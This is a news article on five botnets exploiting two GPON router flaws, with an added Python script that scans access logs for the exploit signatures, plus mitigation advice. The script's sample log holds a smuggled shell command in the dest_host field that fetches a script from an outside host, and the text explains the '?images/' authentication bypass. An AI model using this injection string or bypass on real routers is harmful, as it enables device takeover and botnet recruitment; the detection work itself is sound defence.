11 May 2018

Within days of the public disclosure of two critical vulnerabilities in GPON routers, at least five botnet families have been found exploiting the flaws to recruit the affected devices, roughly a million of which are exposed to the Internet.

Security researchers at the China-based cybersecurity firm Qihoo 360 Netlab have identified five botnet families, namely Mettle, Muhstik, Mirai, Hajime, and Satori, that now use the GPON exploit.

Gigabit-capable Passive Optical Network (GPON) routers manufactured by South Korea-based DASAN Zhone Solutions have been found vulnerable to an authentication bypass (CVE-2018-10561) and a root-level remote command execution flaw (CVE-2018-10562); chained together, the two let an unauthenticated remote attacker take full control of the device.

As soon as the details of the vulnerabilities were disclosed, 360 Netlab researchers warned that threat actors were already chaining both flaws to compromise vulnerable routers and enlist them in their botnets.

The researchers have now published a report describing the five botnet families actively exploiting these issues:

Mettle Botnet: Its command-and-control panel and scanner are hosted on a server in Vietnam. The operators use Mettle, the open-source Metasploit payload for embedded Linux, to implant malware on vulnerable routers.

Muhstik Botnet: First discovered in April while actively exploiting a critical Drupal flaw, the latest version of Muhstik has been upgraded to exploit the GPON vulnerabilities alongside flaws in JBoss and DD-WRT firmware.

Mirai Botnet (new variants): The GPON exploit has also been integrated into several new variants of the infamous Mirai IoT botnet, whose source code was leaked in 2016 after it had been used to launch record-breaking DDoS attacks.

Hajime Botnet: This IoT botnet has also been seen adding the GPON exploit to its code to target hundreds of thousands of home routers.

Satori Botnet: The infamous botnet, also known as Okiru, which infected 260,000 devices within 12 hours last year, has likewise been observed carrying the GPON exploit in its latest variant.

The researchers who discovered the GPON vulnerabilities reported them to the router manufacturer before going public, but the company has not yet released a fix.

To make things worse, a working proof-of-concept (PoC) exploit that chains the two vulnerabilities has been published, which lowers the bar for any attacker.
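To make the public PoC's footprint concrete, the following is an added example written for this page (not code from the original article, from 360 Netlab, or from the researchers who found the flaws) that triages a GPON router's HTTP access log for both signatures. It relies on two details from the public disclosure: the authentication bypass works because the management web server serves any URL containing "images/" without a login, and the command injection sits in the dest_host field of the ping diagnostic form posted to /GponForm/diag_Form. The log format (Common Log Format with the POST body appended as a final quoted field) and every entry in it are constructed for the example; a device's own access log normally does not record POST bodies, so in practice that field would come from a packet capture or an inspecting proxy in front of the router.

```python
"""Triage a GPON router's HTTP access log for the two flaws above.

CVE-2018-10561: the management web server skips authentication for any
request whose URL contains "images/", so appending "?images/" to a
protected page serves it without a login.
CVE-2018-10562: the ping diagnostic (POST /GponForm/diag_Form) passes the
dest_host field to a shell unsanitised, so shell metacharacters in it run
commands as root.  The public PoC chains the two.
"""
import re
from urllib.parse import unquote, urlsplit

# Constructed sample log: Common Log Format plus a trailing quoted POST body
# so the diagnostic form fields are visible. Made-up entries, not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/May/2018:03:14:07 +0000] "GET /menu.html HTTP/1.1" 302 0
203.0.113.7 - - [10/May/2018:03:14:08 +0000] "GET /menu.html?images/ HTTP/1.1" 200 5120
203.0.113.7 - - [10/May/2018:03:14:09 +0000] "POST /GponForm/diag_Form?images/ HTTP/1.1" 200 812 "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox wget http://203.0.113.9/gpon.sh -O /tmp/gpon.sh`;&ipv=0"
192.0.2.55 - - [10/May/2018:03:20:01 +0000] "POST /GponForm/diag_Form HTTP/1.1" 200 812 "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=8.8.8.8&ipv=0"
192.0.2.55 - - [10/May/2018:03:21:44 +0000] "GET /images/logo.png HTTP/1.1" 200 2044
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+'
    r'(?: "(?P<body>[^"]*)")?'
)

# '&' is the form field separator, so it cannot serve as an injection marker.
SHELL_META = ("`", ";", "|", "$(", "\n")
DIAG_PATH = "/GponForm/diag_Form"


def parse_form(body):
    """Split a urlencoded form body by hand: older parse_qs() versions also
    split on ';', which would swallow an injected ';' in dest_host."""
    fields = {}
    for pair in body.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            fields[unquote(key)] = unquote(value.replace("+", " "))
    return fields


def is_auth_bypass(target):
    """CVE-2018-10561 signature: 'images/' in the query string of a URL that
    is not actually under the /images/ directory."""
    parts = urlsplit(target)
    return "images/" in parts.query and not parts.path.startswith("/images/")


def is_command_injection(target, body):
    """CVE-2018-10562 signature: a ping diagnostic whose dest_host carries
    shell metacharacters instead of a hostname or address."""
    if urlsplit(target).path != DIAG_PATH or not body:
        return False
    dest = parse_form(body).get("dest_host", "")
    return any(meta in dest for meta in SHELL_META)


def triage(log_text):
    """Return (client_ip, cve, evidence) for every suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than guess
        ip, target, body = m["ip"], m["target"], m["body"]
        if is_auth_bypass(target):
            findings.append((ip, "CVE-2018-10561", target))
        if is_command_injection(target, body):
            findings.append((ip, "CVE-2018-10562", parse_form(body)["dest_host"]))
    return findings


def attacker_ips(findings):
    """Distinct source addresses worth blocking or hunting for elsewhere."""
    return sorted({ip for ip, _, _ in findings})


if __name__ == "__main__":
    for ip, cve, evidence in triage(SAMPLE_LOG):
        print(f"{ip}  {cve}  {evidence}")
    print("sources:", ", ".join(attacker_ips(triage(SAMPLE_LOG))))
```

On the sample, the script flags three requests from the same source: the bypass twice (once on the menu page and once on the diagnostic POST itself, since the PoC appends ?images/ there too) and the injection once, while the legitimate ping to 8.8.8.8 and the real image fetch pass untouched. Checking the query string rather than the whole URL keeps genuine /images/ requests out of the results.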

Until the manufacturer releases an official patch, users can reduce their exposure by disabling remote administration so that the web management interface is no longer reachable from the WAN side or, where the router offers no such option, by placing the device behind a separate firewall that blocks inbound connections to its management ports from the public Internet.

Either change limits access to the local network, within range of the Wi-Fi or wired LAN, which takes remote attackers out of the picture but does not fix the flaws themselves: both remain exploitable by anyone already on the LAN, including malware on an infected PC, so a device that was exposed before the change should not simply be assumed clean.

Otherwise, users must wait for official fixes from the router manufacturer.
